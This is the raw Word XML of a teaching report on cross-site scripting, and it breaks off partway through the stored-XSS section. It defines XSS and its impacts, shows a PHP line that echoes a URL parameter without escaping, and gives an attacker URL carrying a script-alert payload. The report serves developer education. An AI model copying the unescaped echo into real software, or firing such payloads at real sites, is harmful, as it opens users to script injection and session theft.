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5E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="400"/>
              <w:left w:type="dxa" w:w="400"/>
              <w:bottom w:type="dxa" w:w="400"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="200"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:caps/>
                <w:color w:val="A8D8C8"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TECHNICAL SECURITY REPORT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="200" w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="C8EDE3"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">In-Depth Analysis, Attack Vectors &amp; Mitigation Strategies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="A8D8C8"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared by Inlighn Tech  |  Cybersecurity Division  |  2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Overview</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0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Report Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">In-Depth Notes on Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Author / Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Inlighn Tech — Cybersecurity Division</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Technical Security Research</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">v1.0 — Final</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Security — XSS Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D4EDE5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Audience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Developers, Security Professionals, QA Engineers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS) is one of the most prevalent and dangerous web application vulnerabilities documented today. It allows malicious actors to inject scripts into web pages viewed by other users, executing arbitrary code within the victim's browser session. This report provides a comprehensive technical analysis of XSS — its types, mechanisms, real-world impact, and a layered set of mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS exploits the inherent trust a browser places in content served from a website. When applications fail to validate, sanitize, or encode user input, an attacker can inject JavaScript (or other scripts) that runs with the privileges of the target site. The consequences range from session hijacking and data theft to full account takeover and large-scale malware distribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Cross-Site Scripting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS occurs when an attacker successfully injects malicious scripts into a web application that are then served to and executed by other users' browsers. The root cause is improper handling of user-supplied input — specifically, the failure to validate, sanitize, or escape that input before it is rendered in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Characteristics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Execution Context: Malicious scripts run within the victim's browser under the security context of the target website.</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Attack Vector: Primarily JavaScript injection, though VBScript and HTML element manipulation are also used.</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Impact: Session theft, data leakage, account takeover, phishing, defacement, and malware distribution.</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Root Cause: Failure to validate, sanitize, or escape user input before rendering it in the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Types of XSS Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS is categorized into three primary types, each with distinct delivery mechanisms, persistence characteristics, and exploitation methods.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E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF7F3" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Type 1: Reflected XSS (Non-Persistent)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="60"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reflected XSS occurs when user input submitted via URL parameters or form fields is immediately echoed back in the server's response without proper sanitization. The malicious payload is embedded in the request itself and executes when the victim loads the crafted URL.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="60"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mechanism: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker crafts a malicious URL → victim clicks the link (via phishing/social engineering) → server echoes unsanitized input → browser executes injected script.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="40"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session cookie theft, unauthorized redirects, actions performed on behalf of the user. Requires victim interaction; attack is non-persistent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Example — Vulnerable PHP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 Vulnerable code --&gt;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&lt;p&gt;Search results for: &lt;?php echo $_GET['query']; ?&gt;&lt;/p&gt;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 Attacker URL --&gt;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http://example.com/search?query=&lt;script&gt;alert('Hacked')&lt;/script&gt;</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E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E3F4EE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Type 2: Stored XSS (Persistent)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="60"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored XSS occurs when malicious scripts are saved into the application's database (e.g., through comment fields, forum posts, or profile data) and subsequently served to all users who view the affected page. This makes it significantly more dangerous than reflected XSS.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="60"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
